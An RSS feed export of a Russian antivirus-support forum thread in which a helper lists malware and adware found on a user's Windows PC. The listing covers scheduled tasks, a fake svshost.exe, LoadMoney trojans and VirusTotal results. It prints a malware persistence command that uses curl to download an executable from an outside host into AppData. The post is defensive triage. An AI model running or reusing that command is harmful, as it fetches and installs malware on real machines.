<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Баз данных сигнатур вирусов устарела]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Баз данных сигнатур вирусов устарела форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Tue, 21 Apr 2026 15:09:07 +0300</pubDate>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99841/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			Вячеслав Букас<br /><br />Кто лучше оценивает ситуацию<br />Вы или я ?<br />Mail.ru-агент - а кто его трогал ?<br /><br />Amigo - нет в системе ( есть ведущие в никуда ярлыки )<br />HASPLMS.EXE &nbsp; - Файла нет в системе.<br />ACRORD32INFO.EXE - Файла нет в системе.<br />Zona ( см. пункт 3 )<br /><br />ADGUARD - часто источник проблем.<br />Если он нужен то _ после_ того как проблема решена его ровно 5 минут переустановить.<br /><br /><br />____________________<br />1) &nbsp;	<br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<noindex><a href="HTTP://AMTOMIL.RU/F.EXE" target="_blank" rel="nofollow">HTTP://AMTOMIL.RU/F.EXE</a></noindex><br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <noindex><a href="HTTP://AMTOMIL.RU/F.EXE" target="_blank" rel="nofollow">HTTP://AMTOMIL.RU/F.EXE</a></noindex><br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;в автозапуске <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; -F -L "HTTP://AMTOMIL.RU/F.EXE" -O "C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\CURL\CURL.EXE"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\CURL<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6B7F9B0-7F11-4A76-901A-E9AD930612DE}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "C:\Users\Дмитрий\AppData\Roaming\curl\curl_7_54.exe" -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Дмитрий\AppData\Roaming\curl\curl.exe"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6B7F9B0-7F11-4A76-901A-E9AD930612DE}\<br /><br />_____________________<br />2) Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\ДМИТРИЙ\APPDATA\LOCAL\SVSHOST\SVSHOST.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SVSHOST.EXE<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br /><br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br />Инф. о файле &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Не удается найти указанный файл. <br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; проверка не производилась<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ<br />Путь до файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Типичен для вирусов и троянов<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Имя файла слишком похоже на имя известного модуля SVCHOST.EXE<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; --STID="14712"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\SVSHOST<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A612A43-201F-4756-9F69-0E0E7482EFE4}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "C:\Users\Дмитрий\AppData\Local\svshost\svshost.exe" --stid="14712"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A612A43-201F-4756-9F69-0E0E7482EFE4}\<br /><br />3) ZONA = potentially unwanted<br /><br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\PROGRAM FILES (X86)\ZONA\ZONA.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ZONA.EXE<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ [Запускался неявно или вручную] <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><noindex><a href="http://www.virustotal.com" target="_blank" rel="nofollow">www.virustotal.com</a></noindex> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2017-07-06<br />K7GW &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Unwanted-Program ( 005009ce1 )<br />K7AntiVirus &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Unwanted-Program ( 005009ce1 )<br />DrWeb &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Program.Zona.86<br />Endgame &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; malicious (moderate confidence)<br />ESET-NOD32 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;a variant of Win32/ZvuZona.I potentially unwanted<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /> Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПРОВЕРЕННЫЙ [Запускался неявно или вручную] <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 579897981A5000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.0<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1710256 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;08.03.2017 в 23:19:24<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 08.03.2017 в 23:19:24<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 27.07.2016 в 11:14:32<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5.0<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows graphical user interface (GUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 32-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Действительна, подписано "Chetvertoe pokolenie, OOO"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Версия файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1.0.7.6<br />Описание &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Zona<br />Производитель &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4th generation<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0A9C80026F31DBEED9C29D681EC09432803F3022<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3264D23F1998FB7EE67F78B796D78840<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />SHORTCUT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\ДМИТРИЙ\DESKTOP\Zona.lnk<br />SHORTCUT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\Zona.lnk<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><br />4) <br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\ДМИТРИЙ\APPDATA\LOCAL\SEARCHGO\SEARCHGO.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SEARCHGO.EXE<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><noindex><a href="http://www.virustotal.com" target="_blank" rel="nofollow">www.virustotal.com</a></noindex> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2017-07-06<br /><br />Kaspersky &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AdWare.Win32.Searchgo.n<br /><br />DrWeb &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Trojan.LoadMoney.2303<br /><br />Microsoft &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Adware:Win32/Searchgo<br /><br />ESET-NOD32 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;a variant of Win32/Adware.SearchGo.B<br /><br /><br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПРОВЕРЕННЫЙ в автозапуске <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 592FF79B6F000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;12.0<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;431320 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;05.07.2017 в 19:24:46<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 05.07.2017 в 19:27:28<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 01.06.2017 в 11:16:43<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5.0<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows graphical user interface (GUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 32-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Действительна, подписано "OOO ""Meti-Vostok"""<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Версия файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1.0.0.278<br />Описание &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Searchgo component<br />Производитель &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Searchgo<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;A388241E2682E77F40250B32383DAB1BDB15BE59<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 49E0AF2C4D0870B3187669D61FA65415<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\SEARCHGO TASK<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D3D1CBA2-41A6-4845-BBF8-CFC76D274166}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "C:\Users\Дмитрий\AppData\Local\SearchGo\searchgo.exe"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D3D1CBA2-41A6-4845-BBF8-CFC76D274166}\<br /><br />5) <br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\MICROSOFT\MSI.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MSI.EXE<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><noindex><a href="http://www.virustotal.com" target="_blank" rel="nofollow">www.virustotal.com</a></noindex> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2017-07-05<br /><br />Kaspersky &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; UDS:DangerousObject.Multi.Generic<br /><br />DrWeb &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Trojan.LoadMoney.2399<br /><br />Avira &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TR/Crypt.ZPACK.Gen<br /><br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПРОВЕРЕННЫЙ в автозапуске <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 595CDBA9282000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;6.0<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2634720 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;05.07.2017 в 19:18:36<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 05.07.2017 в 19:22:13<br />Атрибуты &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;СКРЫТЫЙ &nbsp;СИСТЕМНЫЙ &nbsp;R/O &nbsp;<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 05.07.2017 в 12:29:29<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4.0<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows graphical user interface (GUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 32-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Действительна, подписано LLC KORE<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CNT=1 FTS="KMS-AKTIVATOR__OODFELLO\KMS-AKTIVATOR__OODFELLO.EXE"<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;12E8C0F40502E8C6B19720BE0E1761B07B16E8D7<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 149F40495F4BE3BB3179D11067949B1D<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\MSI<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CA332735-3D52-4563-BB36-576F3352295F}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "C:\Users\Дмитрий\AppData\Roaming\Microsoft\msi.exe" cnt=1 fts="kms-aktivator__oodfello\kms-aktivator__oodfello.exe"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CA332735-3D52-4563-BB36-576F3352295F}\<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><br />6) C:\WINDOWS\SYSTEM32\EA3HOST.EXE<br />Kaspersky &nbsp;not-a-virus:RiskTool.Win32.Agent.aojt<br />DrWeb &nbsp;Trojan.LoadMoney.2356 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />_________<br />И помимо этого мусор от:<br />KINGOSOFT<br />и т.д. <br />
			<i>07.07.2017 19:36:49, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99841/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99841/</guid>
			<pubDate>Fri, 07 Jul 2017 19:36:49 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99840/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
